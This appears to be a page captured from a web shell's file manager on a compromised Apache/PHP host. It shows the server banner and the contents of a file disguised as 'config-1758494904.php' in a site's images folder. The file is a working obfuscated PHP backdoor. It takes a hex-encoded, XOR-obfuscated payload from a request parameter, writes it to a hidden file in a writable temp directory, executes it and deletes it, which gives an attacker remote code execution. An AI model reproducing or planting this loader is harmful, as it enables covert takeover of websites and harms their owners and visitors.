HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u103727277 (3416564)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /homepages/4/d860090557/htdocs/clickandbuilds/NotciasWebOnline/images/config-1758494904.php
<!--gXfDNwRw-->
<?php

if(!empty($_REQUEST["en\x74"])){
$bind = hex2bin($_REQUEST["en\x74"]);
$mrk   =   ''    ;      $g=0;do{$mrk.=chr(ord($bind[$g])^78);$g++;}while($g<strlen($bind));
$comp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp"]);
foreach ($comp as $key => $flg) {
            if (array_product([is_dir($flg), is_writable($flg)])) {
            $ptr = "$flg" . "/.pset";
            if ($itm = fopen($ptr, 'w')) {
    fwrite($itm, $mrk);
    fclose($itm);
    include_once $ptr;
    unlink($ptr);
    die();
}
        }
}
}